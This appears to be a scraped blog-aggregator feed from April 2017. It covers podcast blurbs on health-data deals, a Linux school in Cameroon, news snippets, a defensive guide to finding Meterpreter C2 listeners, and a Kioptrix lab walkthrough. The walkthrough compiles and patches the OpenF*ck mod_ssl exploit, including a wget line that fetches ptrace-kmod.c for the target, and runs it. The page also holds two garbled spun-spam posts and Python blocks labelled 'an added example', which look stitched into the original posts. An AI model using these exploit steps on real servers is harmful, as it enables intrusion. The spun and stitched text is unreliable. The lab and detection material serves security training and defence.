
April 24 2017

Data Knightmare: DataKnightmare 1x28 - The mother of all data grabs

Did you think that giving Google five years of medical records for 700,000 patients, for free and without any oversight, was the worst of it? Welcome to the mother of all data grabs, where a prime minister promises the health data of an entire nation to IBM. Without objectives, without controls, without guarantees, without economic return, without a tender. And without letting anyone know.

April 21 2017

videogame confessional forum: jeremy penner

So, my name's Jeremy Penner. I'm 33. Living right now in Ottawa, Ontario in Canada. I don't know, I've been programming since I was old enough to read, which was three or four. So, I've always been...

Informatic school is in southwest Cameroon: TECHSHARE 2016

TECHSHARE 2016

Linux Friends say thank you, Techshare, for your unfailing support to Future Stair Academy. Your support has helped us grow to maturity, with many good players in all categories, both male and female.

Informatic school is in southwest Cameroon: SWISS FRIENDS 2016

SWISS FRIENDS SUPPORT 2016

Swiss Friends have now supported the objectives, activities and development of the Association of Linux Friends Limbe for one year. Swiss Friends have paid for tiles to be laid on the floors of the classrooms and the staircase, for roofing of the building, for motivation payments for seven teachers, and of course have provided a Toyota Rav4 for the Association.


In the news: Trasformatorio, in Scaletta Zanclea artists from all over the world for a sustainable future - Sikily News


Sikily News

Trasformatorio, in Scaletta Zanclea artists from all over the world for a sustainable future
The event is organized by Siddharte and Dyne.org with the patronage of the municipal administration and in collaboration with WISH (World International Sicilian Heritage), CairoTronica (Cairo International Symposium of Digital Arts), MUSIF (Museo ...

April 20 2017

Informatic school is in southwest Cameroon: Computer School with Solar Section

Computer School with Solar Section

The educational project run by the Association of Linux Friends Limbe/Cameroon

Short project description. The computer school run by the Linux Friends in Limbe/Cameroon includes an annual course providing basic knowledge in computer science as well as occasional advanced-level IT courses. Born out of necessity, the school is increasingly also working on electricity production, responding to the fact that in vast parts of Cameroon the power supply needed for operating computers is not assured.

Students pay a symbolic school fee. The training curriculum and teaching methods (e-learning) are developed in accordance with the students’ requests. Upon successful completion of the annual course, students are awarded a certificate approved by the local authorities. The certificate is well appreciated by the participants and considered an entry point to working life. In particular, it enables women to take a first important step towards the formal economic sector.

The educational program is offered as a day school and in evening classes. The teaching staff is recruited from among the graduates of the school. At present, the majority of students and teachers are women. In the past year, 30 graduates (out of about 50 students enrolled) obtained the final certificate.

The Computer School of Linux Friends Limbe was initiated ten years ago by the Swiss Michel Pauli and the Cameroonian Chanceline Ngainku and is registered as a non-profit organization under the name Association of Linux Friends Limbe. As a result of continuous trials and inventive work by the local project team, and thanks to worldwide advances in low-power mini-computers, the school today has well-functioning technical equipment (based on Raspberry Pi 2 and 3 and PiNet) with a total of 17 computer workstations. The school has Internet access. Part of the computer equipment is solar-powered.

As a next big step the project aims to develop and stabilize the advanced-level training. Students are to be able to qualify further in the ICT and solar systems sector. The objective is to realize a qualified training program modelled on the dual vocational training system. Maintenance of the school’s network, as well as commissioned work in computer and solar system installation, will allow students to put the acquired theoretical knowledge into practice. In order to maintain and develop the project’s know-how, the current eight staff positions (including administration and domestic services) need to be expanded to eleven adequately paid positions.

The context. In Cameroon, children from less well-off families generally have little chance of obtaining a good professional education. The number of schools and study places offered by the State is not sufficient. Private schools are expensive, and only expensive schools are in a position to provide the equipment and know-how needed to teach computer science. Dual vocational training as a training method is virtually non-existent. Cameroon is ranked 152 out of 186 countries on the United Nations Human Development Index. Unemployment is high; at the same time the country is registering a shortage of skilled workers. Development projects working in the educational field report difficulties in recruiting specialists for computer and solar system installations. Such projects may be considered potential partners providing commissioned work for educational projects trying to realize dual vocational training in Cameroon. In the Cameroonian economy women are as active as men, but they tend to work in precarious conditions in the informal sector. If a family lacks money for the education of its children, the girls usually end up at the back of the queue.

Objectives 2016/2017. End of 2016: the basic course (beginners’ class) runs optimally; the persons responsible for developing the advanced-level concept are designated. End of 2017: a training concept and a financing plan for the advanced level are designed; with a view to cooperation, contacts with Swiss training centres are initiated.

April 18 2017

In the news: "The published documents on the NSA's alleged malware give information to criminals" - RT en français


RT en français

"The published documents on the NSA's alleged malware give information to criminals"
The NSA's alleged cyber-infiltration tools could be used by anyone capable of reproducing and modifying computer code, says Denis Roio, developer and co-founder of Dyne.org. A hacker group called Shadow ...


April 17 2017

Data Knightmare: dataKnightmare 1x27 - Timeo Danaos

"In God we trust; everyone else bring data"? Yes, if only. The DataKnightmare is afraid of charlatans, even when they bring data; in fact, especially then, because today data is used to justify the decision one has already chosen, not to find out which decision is the right one. An Easter rant.

April 13 2017

Expose human rights abuses, not the people who survive them (https:...

Expose human rights abuses, not the people who survive them

You’d probably never heard of him last week, but his face has gone viral this week. Dr. David Dao, the man who was dragged off of United Airlines flight #3411 on Sunday, was trying to get home to see patients. Instead, he ended up getting violently dragged off of a flight—to provide space for United crewmembers.

https://blog.witness.org/2017/04/expose-human-rights-abuses-not-people-survive/

Trasformatorio: Easy Approaches To Manage Stress

On the opposite hand, your article might bring about a demand actions centered on patterns of cause and effect you have recognized. The reason and effect essay may end in numerous ways. Remember the length necessities of the article. Inside this section you’ll discover examples of essays belonging to different article kinds and manners of […]

Trasformatorio: Advantages and Disadvantages of HMO and PPO Healthcare Plans

Guy understands he have totally freewill. Guys tend toward believe the cosmos was designed due to their unique use. If somebody understands which he or she can’t understand Lord, then they wont attempt judge additional individuals Every individual understands their particular talents, weaknesses and potential. There are numerous methods a willing individual has the skill […]

April 11 2017

Chokepoint: Hunting Red Team Meterpreter C2 Infrastructure

Introduction

This is part 2 of hunting Red Team C2 infrastructure. Part 1 covered finding Empire C2 endpoints. In this post, we will show how to do the same for Meterpreter. No immediately crashing bugs were found in the Meterpreter HTTP/S handler, but there is still enough information to profile these endpoints.

Meterpreter

Meterpreter is an advanced C2 infrastructure often used as a payload with the popular Metasploit exploit framework. It's cross-platform and highly extensible. In this post, we will focus on finding the reverse HTTP/S handlers for Meterpreter.

Meterpreter Headers

Using the HTTP request GET / HTTP/1.0, the following headers were returned.


HTTP/1.1 200 OK
Connection: close
Server: Apache
Content-Length: 44

The thing that stands out here (similar to Empire) is the general lack of headers that would normally be present in a server's response. Also, we sent HTTP/1.0 as the protocol version, but the reply is still HTTP/1.1.

Meterpreter default page


<html><body><h1>It works!</h1></body></html>

Hashes of the default page

MD5: c7b4690c8c46625ef0f328cd7a24a0a3
SHA1: 12179caec26a089cabcbb75c4dbe0bdfe60951f7
SHA-256: 8f3ff2e2482468f3b9315a433b383f0cc0f9eb525889a34d4703b7681330a3fb
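The profile above (bare Server: Apache, Content-Length 44, no Content-Type, the 44-byte "It works!" body) is easy to turn into a check you can run over captured responses. The following Python is an added example, not code from the Chokepoint post: it splits a raw HTTP response, scores each indicator separately, and computes the body digests so they can be compared with the MD5/SHA-1/SHA-256 values listed above. The two sample responses are constructed, not captures from real hosts; the "ordinary Apache" one deliberately serves the same 44 bytes to show that the missing Content-Type and the stripped Server banner, not the body alone, are what separate the two.

```python
import base64
import hashlib
from typing import Dict, Tuple

# Default body a Meterpreter reverse HTTP/S handler returns for any non-backend request
# (44 bytes, as listed above).
DEFAULT_BODY = b"<html><body><h1>It works!</h1></body></html>"

def parse_http_response(raw: bytes) -> Tuple[str, Dict[str, str], bytes]:
    """Split a raw HTTP response into (status line, headers, body).
    Header names are lower-cased; a repeated header keeps its last value."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def profile_response(raw: bytes) -> Dict[str, object]:
    """Score one response against the handler profile described above:
    'Server: Apache', Content-Length 44, no Content-Type, default 'It works!' body.
    The digests are returned so they can be compared with the hashes listed above."""
    status, headers, body = parse_http_response(raw)
    return {
        "status": status,
        "server_apache": headers.get("server") == "Apache",
        "content_length_44": headers.get("content-length") == "44",
        "no_content_type": "content-type" not in headers,
        "body_is_default": body == DEFAULT_BODY,
        "body_b64": base64.b64encode(body).decode(),  # the form the Scans.io records carry
        "md5": hashlib.md5(body).hexdigest(),
        "sha1": hashlib.sha1(body).hexdigest(),
        "sha256": hashlib.sha256(body).hexdigest(),
    }

INDICATORS = ("server_apache", "content_length_44", "no_content_type", "body_is_default")

def looks_like_meterpreter(raw: bytes) -> bool:
    """True only when every indicator matches; a single hit alone is weak evidence."""
    p = profile_response(raw)
    return all(p[k] for k in INDICATORS)

# Constructed sample responses (not captures from real hosts).
METERPRETER_LIKE = (
    b"HTTP/1.1 200 OK\r\nConnection: close\r\nServer: Apache\r\nContent-Length: 44\r\n\r\n"
    + DEFAULT_BODY
)
# A normal Apache serving the same 44-byte file still sends Date, a full Server banner
# and a Content-Type, so it must not match.
ORDINARY_APACHE = (
    b"HTTP/1.1 200 OK\r\nDate: Tue, 11 Apr 2017 10:00:00 GMT\r\n"
    b"Server: Apache/2.4.25 (Debian)\r\nContent-Type: text/html\r\nContent-Length: 44\r\n\r\n"
    + DEFAULT_BODY
)

if __name__ == "__main__":
    for name, raw in (("meterpreter-like", METERPRETER_LIKE), ("ordinary apache", ORDINARY_APACHE)):
        p = profile_response(raw)
        print(name, looks_like_meterpreter(raw), p["sha256"])
```

Requiring all four indicators keeps the false-positive rate down: plenty of minimal servers answer with a bare Server: Apache, and plenty of default pages say "It works!", but the combination with a 44-byte body and no Content-Type is what the handler produces.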

Finding Meterpreter Listeners with Shodan

Shodan is a search engine for security researchers. It routinely scans common ports across the Internet and makes the data publicly available and easily searchable. APIs are also provided for automating many of the tasks involved.

Using the common headers and default web page listed above, we can narrow down the list of possible Meterpreter C2 node candidates on the Internet with a simple query.


'Server: Apache' 'It works!' -'Content-Type' 'Length: 44'

You'll notice that the results returned are all HTTP/1.1, with profiles matching what we scoped out above.

Random URLs

Another characteristic that makes Meterpreter listeners easy to identify is that every request that isn't for the backend gets the same response: a random URL gets the same response as the index. Legitimate servers will typically return a 404.

GET /lkafjdklfjasdklfjalkdjflkajd HTTP/1.0

Changing default values

There's no excuse for leaving your C2 node exposed to the entire Internet. Whitelist the IP space you are testing from, to keep your tests in scope and to avoid having other people attack your nodes. The default server name and page discussed above can be changed through the handler's advanced settings.


use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set LHOST 127.0.0.1
set LPORT 8000
show advanced
set MeterpreterServerName nginx
set HttpUnknownRequestResponse httml_here

Going beyond Shodan

In case there are any doubts about whether the servers found are Meterpreter listeners, the following is a valid URI that will download stage 1 of the Meterpreter session from any given reverse HTTP/S listener.


GET /huO7Mf9GbAoRFBAVSfkxDwLTm3Wcz8n3kuXycv7k4vWV-_dXg3aY1iQy83Cejls15IeYlhUZ0QMT8S1zHKR33-Ga1rVIiV6QNFjXzTgr4lwNq_YR1tqyIbl9ddVzJ8UeYWJ0MJnThtVJ7d46IZnwHYok-XXZJrhqgUaaJMQtmCGCQWFA9tXMVtZtQEaR9Hse2Muw-P5TX4M7LKtm93LLFCT5i1NshdiwcWOnVJq HTTP/1.0

As we discussed in part 1, we can use Scans.io data to get a broader search of HTTPS servers. If you still have a copy of the data, you can run a zgrep search like the following to identify possible C2 nodes.


zgrep 'PGh0bWw+PGJvZHk+PGgxPkl0IHdvcmtzITwvaDE+PC9ib2R5PjwvaHRtbD4=' 20170221-https.gz > /tmp/results.json

This may take several minutes to run, as the datasets are generally several gigabytes in size. The result is a file containing the JSON record for each host that returned the default Meterpreter HTML. You can parse this file and extract each IP address that should be tested.
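The zgrep pattern above is simply the base64 encoding of the default body, and the file it produces is JSON lines, one host per line. The Python below is an added example (not the post's own tooling) of the parsing step: it re-derives the needle, filters the lines, and returns the matching hosts deduplicated and in first-seen order, skipping a truncated last line instead of crashing. It assumes each record carries a top-level "ip" field; the post does not state the schema, so treat that key as an assumption to check against your copy of the data. The sample records are constructed with documentation addresses and invented nesting.

```python
import base64
import ipaddress
import json
from typing import Iterable, List

DEFAULT_BODY = b"<html><body><h1>It works!</h1></body></html>"
# The zgrep pattern from above is just the base64 of the default body.
NEEDLE = base64.b64encode(DEFAULT_BODY).decode()

def extract_candidate_ips(lines: Iterable[str], needle: str = NEEDLE) -> List[str]:
    """Walk JSON-lines records (one host per line, as zgrep leaves them) and return,
    deduplicated and in first-seen order, the IPs whose record contains the base64
    default body. Assumption: each record has a top-level "ip" field."""
    found: List[str] = []
    seen = set()
    for line in lines:
        line = line.strip()
        if not line or needle not in line:
            continue          # cheap substring check before paying for json.loads
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue          # truncated last line or non-JSON noise: skip, don't crash
        ip = rec.get("ip")
        try:
            ipaddress.ip_address(ip)
        except (ValueError, TypeError):
            continue          # missing or malformed address
        if ip not in seen:
            seen.add(ip)
            found.append(ip)
    return found

# Constructed sample of what /tmp/results.json might hold (documentation addresses,
# invented nesting); not real scan data.
SAMPLE_RESULTS = [
    json.dumps({"ip": "192.0.2.10", "data": {"http": {"response": {"body": NEEDLE}}}}),
    json.dumps({"ip": "192.0.2.10", "data": {"http": {"response": {"body": NEEDLE}}}}),  # duplicate host
    json.dumps({"ip": "192.0.2.11", "data": {"http": {"response": {"body": "PCFET0NUWVBFIGh0bWw+"}}}}),
    json.dumps({"ip": "not-an-ip", "data": {"http": {"response": {"body": NEEDLE}}}}),
    '{"ip": "192.0.2.12", "data": {"http": {"response": {"body": "' + NEEDLE,  # truncated line
    json.dumps({"ip": "198.51.100.7", "data": {"http": {"response": {"body": NEEDLE}}}}),
]

if __name__ == "__main__":
    print(extract_candidate_ips(SAMPLE_RESULTS))   # ['192.0.2.10', '198.51.100.7']
```

Matching on the base64 string rather than decoding every record is what keeps this fast on a multi-gigabyte dump; the candidates it yields still need the per-host confirmation described above before anyone acts on them.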

Happy hunting.

Data Knightmare: dataKnightmare 1x26 - Sovereignty over data

The natives of the Americas traded gold and gems for worthless mirrors and beads. Today a public hospital hands over millions of medical records pro bono to a technology company so that it can develop diagnostic applications. Spot the difference. Data may be the new oil. The problem is that people are not fossils.

April 09 2017

Museo dell'Informatica funzionante: Now and always Resistance: basic electronics course, 4th edition!

April 08 2017

videogame confessional forum: gennifer hutchison

Okay, yeah. My name is Gennifer Hutchison. I'm 39 and I am based in Los Angeles. I'm a television writer and while I also write for features, I'm probably best known for writing on Breaking Bad and...

April 07 2017

In the news: Did Amsterdam spawn a digital monster with the internet? - Netkwesties


Netkwesties

Did Amsterdam spawn a digital monster with the internet?
The winner was Totem Open Health, a complex open source project for the safe use of digitally collected medical data. An honourable mention went to Dowse.eu by Dyne.org, a privacy aid for the Internet of Things. The jury was chaired ...

April 06 2017

Tz’ikin TeVé Program 03

We invite you to watch the 3rd episode of Tz’ikin TeVé.

WELCOME to the third broadcast of Tz’ikin TeVé, community television. In this new program, Claro y Pelado and Micrófono Abierto show us some of the demands of the popula…

Chokepoint: Fixing and troubleshooting OpenFuck Exploit

In a previous post I went over a walkthrough for Kioptrix Level 1. I had some issues and wanted to document them for anyone else who may run into them. I'll admit that my first problem was getting ahead of myself and trying to compile the source code before doing anything else. Finally, googling gave the answer that was right smack dab in front of my face: looking at the first 8 lines of the source.


/*
* E-DB Note: Updating OpenFuck Exploit ~ http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
*
* OF version r00t VERY PRIV8 spabam
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
*/

Beyond doing what is outlined on paulsec.github.io, I had done a dist-upgrade of Kali, which seemed to have messed with some other settings. On top of installing libssl-dev, it appeared I was missing some more SSL libraries, and I'll be honest in saying I'm not sure which one fixed my issue, but I ended up installing libssl1.0-dev, libssl1.0.2 and libssl1.1 as outlined below


root@kali:~# apt-cache search libssl
cl-plus-ssl - Common Lisp interface to OpenSSL
dcmtk - OFFIS DICOM toolkit command line utilities
dlang-openssl - D version of the C headers for openssl
libdcmtk-dev - OFFIS DICOM toolkit development libraries and headers
libdcmtk8 - OFFIS DICOM toolkit runtime libraries
libssl-dev - Secure Sockets Layer toolkit - development files
libssl-doc - Secure Sockets Layer toolkit - development documentation
libssl-ocaml - OCaml bindings for OpenSSL (runtime)
libssl-ocaml-dev - OCaml bindings for OpenSSL
libssl1.0-dev - Secure Sockets Layer toolkit - development files
libssl1.0.2 - Secure Sockets Layer toolkit - shared libraries
libssl1.1 - Secure Sockets Layer toolkit - shared libraries
perl-openssl-defaults - version compatibility baseline for Perl OpenSSL packages
r-cran-openssl - GNU R toolkit for encryption, signatures and certificates based on OpenSSL

The point of this is that you may have some missing libraries, and trying to compile the source with them missing doesn't exactly tell you that you're missing something or which ones. So if you are still getting errors when compiling after following what is outlined on paulsec.github.io, you may want to try installing those other SSL libraries like I had to.

Chokepoint: Kioptrix 1 - Vulnhub Walkthrough - ssl_mod

Introduction

This is the second walkthrough I’m doing in the series. I’m tackling VMs that are said to be similar to what’s on the OSCP PWK. Since I’ll be tackling the OSCP again in the future, I figure this will be good practice in the meantime.

Kioptrix is a series itself with, I believe, 5 vulnerable VMs geared towards beginners, and since that’s still what I consider myself, I’m going to tackle this whole series.

I had some trouble early on with the initial porting from the VMware vmdk to VirtualBox, since that’s what I’m currently using. Porting it over isn’t hard; I just had to remember how from the last time I did it. A quick google turned up the easy information I had forgotten. Also to note: my version of VirtualBox defaulted to SSD for the hard drive, but Kioptrix wasn’t having that and gave me a kernel panic. Changing that to an IDE hard drive fixed it. The next issue was getting DHCP to issue an IP address. I have pfSense running for the internal network to keep my environment safe and not let anything in or out other than the host OS. For whatever reason Kioptrix didn’t like the Intel PRO/1000 virtual chipset, so I had to change that to PCnet-PCI II for it to get DHCP. I assume that has something to do with my version of VirtualBox and how old the kernel on the VM is. Either way I got it working.

Enumeration

As always I start by enumerating the ports to see what’s open, gathering the headers, versions and OS information. ENUMERATE ALL THE THINGS!


root@kali:~# nmap -sV -Pn -p1-65535 -A 172.16.2.13 --open

Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-02 13:57 CDT
Nmap scan report for 172.16.2.13
Host is up (0.00033s latency).
Not shown: 65529 closed ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32770/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
|_ssl-date: 2017-04-02T19:56:59+00:00; +59m19s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_64_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
|_ SSL2_RC4_128_WITH_MD5
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:AF:56:C9 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Network Distance: 1 hop

Host script results:
|_clock-skew: mean: 59m18s, deviation: 0s, median: 59m18s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: , NetBIOS MAC: (unknown)

TRACEROUTE
HOP RTT ADDRESS
1 0.33 ms 172.16.2.13
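Scan output like the above is easier to triage consistently when it is parsed rather than read. The Python below is an added example, not part of the walkthrough: it groups nmap's normal-output lines into one record per port, attaches the NSE script lines to that port, and flags what this scan actually exposes (SSHv1, SSLv2, HTTP TRACE, and the Apache 1.3.x / mod_ssl 2.8.x banners). The version thresholds are the ones nikto reports later on this page (mod_ssl 2.8.7 and lower, CVE-2002-0082; Apache 1.3 below 1.3.29, CAN-2003-0542). The sample input is a constructed excerpt that mirrors the scan above, not a new capture.

```python
import re
from typing import Dict, List, Tuple

# Constructed excerpt in nmap "normal" output format, mirroring the scan above
# (interesting lines only; not a new capture).
SAMPLE_NMAP = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
| sslv2:
| SSLv2 supported
"""

# port/proto  state  service  rest-of-line (version banner)
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

def parse_nmap_ports(text: str) -> List[Dict]:
    """Turn nmap normal output into one record per port; NSE script lines
    (those starting with '|') are attached to the port that precedes them."""
    ports: List[Dict] = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                "service": m.group(4), "version": m.group(5).strip(), "scripts": [],
            })
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").strip())
    return ports

def version_tuple(v: str) -> Tuple[int, ...]:
    return tuple(int(x) for x in v.split("."))

def triage(ports: List[Dict]) -> List[Tuple[int, str]]:
    """Flag weaknesses visible in banners and NSE output. Thresholds: mod_ssl <= 2.8.7
    (CVE-2002-0082) and Apache 1.3 below 1.3.29 (CAN-2003-0542), as nikto reports."""
    findings: List[Tuple[int, str]] = []
    for p in ports:
        scripts = " ".join(p["scripts"])
        if "supports SSHv1" in scripts:
            findings.append((p["port"], "sshv1"))
        if "SSLv2 supported" in scripts:
            findings.append((p["port"], "sslv2"))
        if "TRACE" in scripts:
            findings.append((p["port"], "http-trace"))
        m = re.search(r"mod_ssl/(\d+\.\d+\.\d+)", p["version"])
        if m and version_tuple(m.group(1)) <= (2, 8, 7):
            findings.append((p["port"], "mod_ssl<=2.8.7"))
        m = re.search(r"Apache(?:/| httpd )(\d+\.\d+\.\d+)", p["version"])
        if m and (1, 3, 0) <= version_tuple(m.group(1)) < (1, 3, 29):
            findings.append((p["port"], "apache-1.3<1.3.29"))
    return findings

if __name__ == "__main__":
    for port, tag in triage(parse_nmap_ports(SAMPLE_NMAP)):
        print(f"{port}/tcp  {tag}")
```

The same parser works on a full `-oN` file; the point of keeping the tags short and fixed is that they can be counted and diffed between scans, which is how a blue team tracks whether legacy protocol support (SSHv1, SSLv2) and unpatched banners are actually going away.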

Just the open ports and services seem to give a great deal of information. We see both port 80 and 443 open, so let’s run nikto and see what it comes up with next.


root@kali:~# nikto -host 172.16.2.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.2.13
+ Target Hostname: 172.16.2.13
+ Target Port: 80
+ Start Time: 2017-04-05 21:25:29 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep 5 22:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 17 error(s) and 19 item(s) reported on remote host
+ End Time: 2017-04-05 21:33:12 (GMT-5) (463 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

I highlighted the part that looked most interesting to me. Seems there's a remote buffer overflow which allows attackers to kill any process on the system with CVE-2002-0082, so let's google around for that.

Looks like we have an exploit from exploit-db! That's very hopeful. Prior to going all out and compiling and attacking, read the source first. The source tells you it's outdated and needs some updates, and shows a URL to head to. Remember the CVE is from 2002! So heading over to the URL, it shows the following updates that need to be made.


apt-get install libssl-dev

add the following header includes to the source code


#include <openssl/rc4.h>
#include <openssl/md5.h>

Next, search in the source code for "wget" (without the quotes) and replace the URL you find with this one


http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Next, find line 961 and add "const" to the beginning; it should look like the following

const unsigned char *p, *end;

Finally we need to compile it


gcc -o OpenFuck 764.c -lcrypto

I did mine slightly differently, since my lab doesn't go out to the Internet other than from my Kali box if I change the network configuration. So I downloaded ptrace-kmod.c from packetstormsecurity to my Kali box, moved it to /var/www/html, started Apache and changed the line with wget to 172.16.2.13/ptrace-kmod.c.


wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
mv ptrace-kmod.c /var/www/html
service apache2 start

Finally let's run the exploit!


root@kali:~# ./openfuck

*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************

: Usage: ./openfuck target box [port] [-c N]

target - supported box eg: 0x00
box - hostname or IP address
port - port for ssl connection
-c open N connections. (use range 40-50 if u dont know)


Supported OffSet:
0x00 - Caldera OpenLinux (apache-1.3.26)
0x01 - Cobalt Sun 6.0 (apache-1.3.12)
0x02 - Cobalt Sun 6.0 (apache-1.3.20)
0x03 - Cobalt Sun x (apache-1.3.26)
0x04 - Cobalt Sun x Fixed2 (apache-1.3.26)
0x05 - Conectiva 4 (apache-1.3.6)
0x06 - Conectiva 4.1 (apache-1.3.9)
0x07 - Conectiva 6 (apache-1.3.14)
0x08 - Conectiva 7 (apache-1.3.12)
0x09 - Conectiva 7 (apache-1.3.19)
0x0a - Conectiva 7/8 (apache-1.3.26)
0x0b - Conectiva 8 (apache-1.3.22)
0x0c - Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)
0x0d - Debian GNU Linux (apache_1.3.19-1)
0x0e - Debian GNU Linux (apache_1.3.22-2)
0x0f - Debian GNU Linux (apache-1.3.22-2.1)
0x10 - Debian GNU Linux (apache-1.3.22-5)
0x11 - Debian GNU Linux (apache_1.3.23-1)
0x12 - Debian GNU Linux (apache_1.3.24-2.1)
0x13 - Debian Linux GNU Linux 2 (apache_1.3.24-2.1)
0x14 - Debian GNU Linux (apache_1.3.24-3)
0x15 - Debian GNU Linux (apache-1.3.26-1)
0x16 - Debian GNU Linux 3.0 Woody (apache-1.3.26-1)
0x17 - Debian GNU Linux (apache-1.3.27)
0x18 - FreeBSD (apache-1.3.9)
0x19 - FreeBSD (apache-1.3.11)
0x1a - FreeBSD (apache-1.3.12.1.40)
0x1b - FreeBSD (apache-1.3.12.1.40)
0x1c - FreeBSD (apache-1.3.12.1.40)
0x1d - FreeBSD (apache-1.3.12.1.40_1)
0x1e - FreeBSD (apache-1.3.12)
0x1f - FreeBSD (apache-1.3.14)
0x20 - FreeBSD (apache-1.3.14)
0x21 - FreeBSD (apache-1.3.14)
0x22 - FreeBSD (apache-1.3.14)
